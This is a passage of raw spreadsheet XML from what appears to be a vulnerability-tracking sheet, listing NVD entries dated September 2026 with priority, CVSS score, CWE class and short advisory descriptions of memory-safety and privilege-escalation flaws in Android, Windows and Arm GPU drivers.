r="K444" s="5" t="inlineStr" /><c r="L444" s="5" t="inlineStr" /><c r="M444" s="5" t="inlineStr" /><c r="N444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P444" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q444" s="5" t="inlineStr" /><c r="R444" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S444" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T444" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t></is></c></row><row r="445"><c r="A445" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C445" s="5" t="inlineStr"><is><t>CVE-2026-49887</t></is></c><c r="D445" s="5" t="n"><v>7.8</v></c><c r="E445" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F445" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G445" s="5" t="inlineStr" /><c r="H445" s="5" t="n"><v>0.001</v></c><c r="I445" s="5" t="inlineStr" /><c r="J445" s="5" t="inlineStr" /><c r="K445" s="5" t="inlineStr" /><c r="L445" s="5" t="inlineStr" /><c r="M445" s="5" t="inlineStr" /><c r="N445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P445" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q445" s="5" t="inlineStr" /><c r="R445" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S445" s="5" t="inlineStr"><is><t>In maybeRemoveInvalidInstallerPackageName of InstallRepository.kt, there is a possible unauthorized app update due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T445" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t></is></c></row><row r="446"><c r="A446" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C446" s="5" t="inlineStr"><is><t>CVE-2026-49918</t></is></c><c r="D446" s="5" t="n"><v>7.8</v></c><c r="E446" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F446" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G446" s="5" t="inlineStr" /><c r="H446" s="5" t="n"><v>0.001</v></c><c r="I446" s="5" t="inlineStr" /><c r="J446" s="5" t="inlineStr" /><c r="K446" s="5" t="inlineStr" /><c r="L446" s="5" t="inlineStr" /><c r="M446" s="5" t="inlineStr" /><c r="N446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P446" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q446" s="5" t="inlineStr" /><c r="R446" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S446" s="5" t="inlineStr"><is><t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T446" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t></is></c></row><row r="447"><c r="A447" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C447" s="5" t="inlineStr"><is><t>CVE-2026-49919</t></is></c><c r="D447" s="5" t="n"><v>7.8</v></c><c r="E447" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F447" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G447" s="5" t="inlineStr" /><c r="H447" s="5" t="n"><v>0.001</v></c><c r="I447" s="5" t="inlineStr" /><c r="J447" s="5" t="inlineStr" /><c r="K447" s="5" t="inlineStr" /><c r="L447" s="5" t="inlineStr" /><c r="M447" s="5" t="inlineStr" /><c r="N447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P447" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q447" s="5" t="inlineStr" /><c r="R447" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S447" s="5" t="inlineStr"><is><t>In tt_face_colr_blend_layer of ttcolr.c, there is a possible remote code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T447" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t></is></c></row><row r="448"><c r="A448" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B448" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C448" s="5" t="inlineStr"><is><t>CVE-2026-49927</t></is></c><c r="D448" s="5" t="n"><v>7.8</v></c><c r="E448" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F448" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G448" s="5" t="inlineStr" /><c r="H448" s="5" t="n"><v>0.001</v></c><c r="I448" s="5" t="inlineStr" /><c r="J448" s="5" t="inlineStr" /><c r="K448" s="5" t="inlineStr" /><c r="L448" s="5" t="inlineStr" /><c r="M448" s="5" t="inlineStr" /><c r="N448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q448" s="5" t="inlineStr" /><c r="R448" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S448" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T448" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t></is></c></row><row r="449"><c r="A449" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C449" s="5" t="inlineStr"><is><t>CVE-2026-49932</t></is></c><c r="D449" s="5" t="n"><v>7.8</v></c><c r="E449" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F449" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G449" s="5" t="inlineStr" /><c r="H449" s="5" t="n"><v>0.001</v></c><c r="I449" s="5" t="inlineStr" /><c r="J449" s="5" t="inlineStr" /><c r="K449" s="5" t="inlineStr" /><c r="L449" s="5" t="inlineStr" /><c r="M449" s="5" t="inlineStr" /><c r="N449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q449" s="5" t="inlineStr" /><c r="R449" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S449" s="5" t="inlineStr"><is><t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t></is></c></row><row r="450"><c r="A450" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C450" s="5" t="inlineStr"><is><t>CVE-2026-55273</t></is></c><c r="D450" s="5" t="n"><v>7.8</v></c><c r="E450" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F450" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G450" s="5" t="inlineStr" /><c r="H450" s="5" t="n"><v>0.001</v></c><c r="I450" s="5" t="inlineStr" /><c r="J450" s="5" t="inlineStr" /><c r="K450" s="5" t="inlineStr" /><c r="L450" s="5" t="inlineStr" /><c r="M450" s="5" t="inlineStr" /><c r="N450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q450" s="5" t="inlineStr" /><c r="R450" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S450" s="5" t="inlineStr"><is><t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t></is></c></row><row r="451"><c r="A451" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B451" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C451" s="5" t="inlineStr"><is><t>CVE-2026-55285</t></is></c><c r="D451" s="5" t="n"><v>7.8</v></c><c r="E451" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F451" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G451" s="5" t="inlineStr" /><c r="H451" s="5" t="n"><v>0.001</v></c><c r="I451" s="5" t="inlineStr" /><c r="J451" s="5" t="inlineStr" /><c r="K451" s="5" t="inlineStr" /><c r="L451" s="5" t="inlineStr" /><c r="M451" s="5" t="inlineStr" /><c r="N451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q451" s="5" t="inlineStr" /><c r="R451" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S451" s="5" t="inlineStr"><is><t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t></is></c></row><row r="452"><c r="A452" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B452" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C452" s="5" t="inlineStr"><is><t>CVE-2026-55294</t></is></c><c r="D452" s="5" t="n"><v>7.8</v></c><c r="E452" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F452" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G452" s="5" t="inlineStr" /><c r="H452" s="5" t="n"><v>0.001</v></c><c r="I452" s="5" t="inlineStr" /><c r="J452" s="5" t="inlineStr" /><c r="K452" s="5" t="inlineStr" /><c r="L452" s="5" t="inlineStr" /><c r="M452" s="5" t="inlineStr" /><c r="N452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q452" s="5" t="inlineStr" /><c r="R452" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S452" s="5" t="inlineStr"><is><t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t></is></c></row><row r="453"><c r="A453" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B453" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C453" s="5" t="inlineStr"><is><t>CVE-2026-56172</t></is></c><c r="D453" s="5" t="n"><v>7.8</v></c><c r="E453" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F453" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G453" s="5" t="inlineStr" /><c r="H453" s="5" t="n"><v>0.003</v></c><c r="I453" s="5" t="inlineStr" /><c r="J453" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K453"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453" s="5" t="inlineStr" /><c r="M453" s="5" t="inlineStr" /><c r="N453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P453" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q453" s="5" t="inlineStr" /><c r="R453" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S453" s="5" t="inlineStr"><is><t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T453" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t></is></c></row><row r="454"><c r="A454" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B454" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C454" s="5" t="inlineStr"><is><t>CVE-2026-56177</t></is></c><c r="D454" s="5" t="n"><v>7.8</v></c><c r="E454" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F454" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G454" s="5" t="inlineStr" /><c r="H454" s="5" t="n"><v>0.003</v></c><c r="I454" s="5" t="inlineStr" /><c r="J454" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K45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54" s="5" t="inlineStr" /><c r="M454" s="5" t="inlineStr" /><c r="N454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P454" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q454" s="5" t="inlineStr" /><c r="R454" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S454" s="5" t="inlineStr"><is><t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t></is></c></row><row r="455"><c r="A455" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B455" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C455" s="5" t="inlineStr"><is><t>CVE-2026-56198</t></is></c><c r="D455" s="5" t="n"><v>7.8</v></c><c r="E455" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F455" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G455" s="5" t="inlineStr" /><c r="H455" s="5" t="n"><v>0.002</v></c><c r="I455" s="5" t="inlineStr" /><c r="J455" s="5" t="inlineStr" /><c r="K455" s="5" t="inlineStr" /><c r="L455" s="5" t="inlineStr" /><c r="M455" s="5" t="inlineStr" /><c r="N455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P455" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q455" s="5" t="inlineStr" /><c r="R455" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S455" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t></is></c></row><row r="456"><c r="A456" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B456" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C456" s="5" t="inlineStr"><is><t>CVE-2026-5729</t></is></c><c r="D456" s="5" t="n"><v>7.8</v></c><c r="E456" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F456" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G456" s="5" t="inlineStr" /><c r="H456" s="5" t="n"><v>0.001</v></c><c r="I456" s="5" t="inlineStr" /><c r="J456" s="5" t="inlineStr" /><c r="K456" s="5" t="inlineStr" /><c r="L456" s="5" t="inlineStr" /><c r="M456" s="5" t="inlineStr" /><c r="N456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P456" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q456" s="5" t="inlineStr" /><c r="R456" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S456" s="5" t="inlineStr"><is><t>Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform valid GPU processing operations to access already freed memory.



This issue affects Valhall GPU Kernel Driver: from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r50p0 through r54p3, r55p0.</t></is></c><c r="T456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t></is></c></row><row r="457"><c r="A457" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B457" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C457" s="5" t="inlineStr"><is><t>CVE-2026-58599</t></is></c><c r="D457" s="5" t="n"><v>7.8</v></c><c r="E457" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F457" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G457" s="5" t="inlineStr" /><c r="H457" s="5" t="n"><v>0.003</v></c><c r="I457" s="5" t="inlineStr" /><c r="J457" s="5" t="inlineStr" /><c r="K457" s="5" t="inlineStr" /><c r="L457" s="5" t="inlineStr" /><c r="M457" s="5" t="inlineStr" /><c r="N457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P457" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q457" s="5" t="inlineStr" /><c r="R457" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S457" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="T457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t></is></c></row><row r="458"><c r="A458" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C458" s="5" t="inlineStr"><is><t>CVE-2026-58600</t></is></c><c r="D458" s="5" t="n"><v>7.8</v></c><c r="E458" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F458" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G458" s="5" t="inlineStr" /><c r="H458" s="5" t="n"><v>0.003</v></c><c r="I458" s="5" t="inlineStr" /><c r="J458" s="5" t="inlineStr" /><c r="K458" s="5" t="inlineStr" /><c r="L458" s="5" t="inlineStr" /><c r="M458" s="5" t="inlineStr" /><c r="N458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P458" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q458" s="5" t="inlineStr" /><c r="R458" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S458" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t></is></c></row><row r="459"><c r="A459" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B459" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C459" s="5" t="inlineStr"><is><t>CVE-2026-58611</t></is></c><c r="D459" s="5" t="n"><v>7.8</v></c><c r="E459" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F459" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G459" s="5" t="inlineStr" /><c r="H459" s="5" t="n"><v>0.002</v></c><c r="I459" s="5" t="inlineStr" /><c r="J459" s="5" t="inlineStr" /><c r="K459" s="5" t="inlineStr"><is><t>microsoft:xbox_gaming_services</t></is></c><c r="L459" s="5" t="inlineStr" /><c r="M459" s="5" t="inlineStr" /><c r="N459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O459" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P459" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q459" s="5" t="inlineStr" /><c r="R459" s="5" t="inlineStr"><is><t>CWE-285</t></is></c><c r="S459" s="5" t="inlineStr"><is><t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t></is></c></row><row r="460"><c r="A460" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B460" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C460" s="5" t="inlineStr"><is><t>CVE-2026-58820</t></is></c><c r="D460" s="5" t="n"><v>7.8</v></c><c r="E460" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F460" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G460" s="5" t="inlineStr" /><c r="H460" s="5" t="n"><v>0.001</v></c><c r="I460" s="5" t="inlineStr" /><c r="J460" s="5" t="inlineStr" /><c r="K460" s="5" t="inlineStr" /><c r="L460" s="5" t="inlineStr" /><c r="M460" s="5" t="inlineStr" /><c r="N460" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P460" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q460" s="5" t="inlineStr" /><c r="R460" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S460" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t></is></c><c r="T460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t></is></c></row><row r="461"><c r="A461" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B461" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C461" s="5" t="inlineStr"><is><t>CVE-2026-58823</t></is></c><c r="D461" s="5" t="n"><v>7.8</v></c><c r="E461" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F461" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G461" s="5" t="inlineStr" /><c r="H461" s="5" t="n"><v>0.001</v></c><c r="I461" s="5" t="inlineStr" /><c r="J461" s="5" t="inlineStr" /><c r="K461" s="5" t="inlineStr" /><c r="L461" s="5" t="inlineStr" /><c r="M461" s="5" t="inlineStr" /><c r="N461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q461" s="5" t="inlineStr" /><c r="R461" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S461" s="5" t="inlineStr"><is><t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t></is></c></row><row r="462"><c r="A462" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B462" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C462" s="5" t="inlineStr"><is><t>CVE-2026-58839</t></is></c><c r="D462" s="5" t="n"><v>7.8</v></c><c r="E462" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F462" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G462" s="5" t="inlineStr" /><c r="H462" s="5" t="n"><v>0.001</v></c><c r="I462" s="5" t="inlineStr" /><c r="J462" s="5" t="inlineStr" /><c r="K462" s="5" t="inlineStr" /><c r="L462" s="5" t="inlineStr" /><c r="M462" s="5" t="inlineStr" /><c r="N462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q462" s="5" t="inlineStr" /><c r="R462" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S462" s="5" t="inlineStr"><is><t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t></is></c></row><row r="463"><c r="A463" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B463" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C463" s="5" t="inlineStr"><is><t>CVE-2026-58846</t></is></c><c r="D463" s="5" t="n"><v>7.8</v></c><c r="E463" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F463" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G463" s="5" t="inlineStr" /><c r="H463" s="5" t="n"><v>0.001</v></c><c r="I463" s="5" t="inlineStr" /><c r="J463" s="5" t="inlineStr" /><c r="K463" s="5" t="inlineStr" /><c r="L463" s="5" t="inlineStr" /><c r="M463" s="5" t="inlineStr" /><c r="N463" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q463" s="5" t="inlineStr" /><c r="R463" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S463" s="5" t="inlineStr"><is><t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t></is></c></row><row r="464"><c r="A464" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B464" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C464" s="5" t="inlineStr"><is><t>CVE-2026-58874</t></is></c><c r="D464" s="5" t="n"><v>7.8</v></c><c r="E464" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F464" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G464" s="5" t="inlineStr" /><c r="H464" s="5" t="n"><v>0.001</v></c><c r="I464" s="5" t="inlineStr" /><c r="J464" s="5" t="inlineStr" /><c r="K464" s="5" t="inlineStr" /><c r="L464" s="5" t="inlineStr" /><c r="M464" s="5" t="inlineStr" /><c r="N464" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q464" s="5" t="inlineStr" /><c r="R464" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S464" s="5" t="inlineStr"><is><t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t></is></c></row><row r="465"><c r="A465" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C465" s="5" t="inlineStr"><is><t>CVE-2026-58941</t></is></c><c r="D465" s="5" t="n"><v>7.8</v></c><c r="E465" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F465" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G465" s="5" t="inlineStr" /><c r="H465" s="5" t="n"><v>0.001</v></c><c r="I465" s="5" t="inlineStr" /><c r="J465" s="5" t="inlineStr" /><c r="K465" s="5" t="inlineStr" /><c r="L465" s="5" t="inlineStr" /><c r="M465" s="5" t="inlineStr" /><c r="N465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q465" s="5" t="inlineStr" /><c r="R465" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S465" s="5" t="inlineStr"><is><t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t></is></c></row><row r="466"><c r="A466" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C466" s="5" 